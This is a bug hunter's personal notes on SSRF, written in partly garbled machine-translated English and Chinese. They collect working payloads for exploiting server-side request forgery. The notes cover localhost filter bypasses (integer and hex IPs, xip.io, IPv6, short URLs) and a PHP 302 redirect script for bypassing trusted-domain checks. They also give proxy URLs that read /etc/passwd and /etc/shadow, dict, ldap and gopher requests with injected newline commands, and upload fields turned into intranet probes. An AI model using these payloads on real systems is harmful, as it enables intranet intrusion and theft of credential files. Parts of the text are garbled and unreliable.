Recently I read a lot ssrf vulnerability discovery techniques and some of his skills and previous experience in mining ssrf loopholes, simple summary:
Prior own summary:
ssrf = server-side request forgery attacks url link based server -> roaming network / intranet services detection / network for open ports detection / getshell / xss / xxe
http://test.com/proxy?url= server address -> server source ip address is not your local ip, eighty percent probability that it will have a presence ssrf
the external access address, ip address non-native
192.168.0.0 - 192.168.255.255
172.16.0.1 - 172.31.255.255
10.0.0.0 - 10.255.255.255
trusted domain
http://baidu.com ->
192.168.0.0 - 192.168.255.255
172.16.0.1 - 172.31.255.255
10.0.0.0 - 10.255.255.255
http://baidu.com/proxy?url=http:// server ip
Open our server:
nc -lvvp port number:
1. Will there be a request -> to determine whether the request will be initiated outside
2. Source ip -> determine whether the request is initiated from the server
ssrf to do?
Information detect intranet / network roaming information?
http://baidu.com/proxy?url=http://127.0.0.1 // hello world test environment
access to external network within the network
ssrf majority exists on the url parameter.
url Jump / share end of the link / print text might exist ssrf attack
url, xurl, loginUrl, urlxxx, xxxurl, xxx_url should try ssrf attack
on behalf of xxx *
ssrf bypass
127.0.0.1 -> 127.0.1.1.xip.io
127.0.0.1 -> Integer ip-> http: // 2130706433
hexadecimal. Octal ip
Reference: https: //www.silisoftware.com/tools/ipconverter.php convert_from = 127.0.0.1?
Practical articles ssrf vulnerabilities reference:
https://shuimugan.com/?BugSearch%5Bbug_no%5D=&BugSearch% 5Btitle% 5D = ssrf & BugSearch% 5Bvendor% 5D = & BugSearch% 5Bauthor% 5D = & BugSearch% 5Bbug_type% 5D = & BugSearch% 5Bbug_level_by_whitehat% 5D = & BugSearch% 5Bbug_level_by_vendor% 5D = & BugSearch% 5Brank_by_whitehat% 5D = & BugSearch% 5Bbug_date% 5D =
Short URL bypassing
http://127.0.0.1
short URLs
https://www.ft12.com/
https://tb.am/
encrypted ip secondary short URLs generated.
Other bypass:
HTTP: // [::] /
http://[::]:22/
http://[::]:25/
Jump to bypass using 302:
302.php
<?php header("location:".$_GET['u']); ?>
http://***.com/302.php?u=http://[::]/
Or other network address
About trusted name:
If the test site is http://test.com, validated * .test.com how about that?
It can be:
Setting the hosts file
Network ip * .test.com
Then directly by http://test.com/proxy?url=*.test.com -> Automatic resolved within the access network address
302 Jump talk:
Trusted name for verification but also how to play?
url url jump jump * .test.com presence of a station
Jump url: http: //*.test.com/xxx.php url = network ip?
ssrf use:
http://test.com/proxy?url=http://*.test.com/xxx.php?url= network ip (url jump)
But also how to play?
If you do not jump url it?
The old way
Setting the hosts file
Network ip * .test.com
http://test.com/proxy?url=http://*.test.com/302.php?url= network ip (url jump)
What a way to bypass the trusted name?
http://test.com/proxy?url=http://test.com@ network ip
What bypassed? May http / https requests are disabled
You can also try the following agreement:
as follows:
file:///
dict://
sftp://
ldap://
tftp://
gopher://
file是文件传输,所以常说ssrf到文件读取:
file:///
File is used to obtain the file from the file system
windows:
http://test.com/proxy?url=file:///C:/Windows/win.ini
linux:http://test.com/proxy?url=file:///etc/passwd
可能etc/passwd被过滤,可以尝试读取别的目录如/etc/shadow /etc/hosts可以读usr或者tmp目录等 可以看看linux系统目录结构
dict:// -
DICT URL方案用于表示使用DICT协议可用的定义或单词列表:
客户端:发起请求:http://test.com/proxy?url=dict://服务器地址:1337
服务器:nc -lvp 1337
查看是否有返回请求
SFTP: //
Sftp on behalf of SSH File Transfer Protocol, or Secure File Transfer Protocol, is a protocol containing SSH, similar to SSH on a secure connection
tftp: // -
Trivial File Transfer Protocol is a simple file transfer protocol lockstep, it allows the client to obtain a file from a remote host or file on the remote host
Similarly and dict: // use the same
Special points:
the LDAP: // or LDAPS: // or ldapi: // -
the LDAP on behalf of Lightweight Directory Access Protocol. It is an IP network management and application access protocol distributed directory information services through.
http://test.com/proxy?url=ldaps://localhost:1337/%0astats%0aquit
http://test.com/proxy?url=ldap://localhost:1337/%0astats%0aquit
HTTP: //test.com/proxy?url=ldapi://localhost:1337/%0astats%0aquit
directly on the line traversing 1337
Gopher: // -
Gopher is a distributed document delivery service. It allows the user to explore a seamless fashion, searching and retrieving information residing in different locations.
http://test.com/proxy?url= Gophar: // server address /gophar.php
gophar.php content:
Another server:
<?php
header('Location: gopher://另一台服务器:1337/_Hi%0Assrf%0Atest');
?>
另一台服务器nc -lvp 1337
返回
Hi\nssrf\ntest
其实我们自己在漏洞挖掘中根本没有我们想象的那么复杂化。。。Talk about some of the hidden point ssrf mining posture, feeling very personal show, usually not concerned about how to:
File upload at ssrf:
Common Position:
File upload packets inside imagePath / Path and other parameters, you can customize the picture address:
Try modified to: http: // intranet ip / favicon.ico favicon.ico much to say on their own Baidu know that if there is a successful upload bulk upload instructions exist ssrf!
文件上传利用2:
今天看到的案例:
文件上传type一般都是file <input type="file">
如果我们尝试把<input type="file">改成type="url"是不是就和上面的案例一样,批量上传http://内网ip/favicon.ico尝试ssrf是否会有上传成功的图片:
案例:
从上传变成url地址上传:
先写这么多,记录下,方便以后查阅方便。基本上漏洞挖掘,没这么复杂。。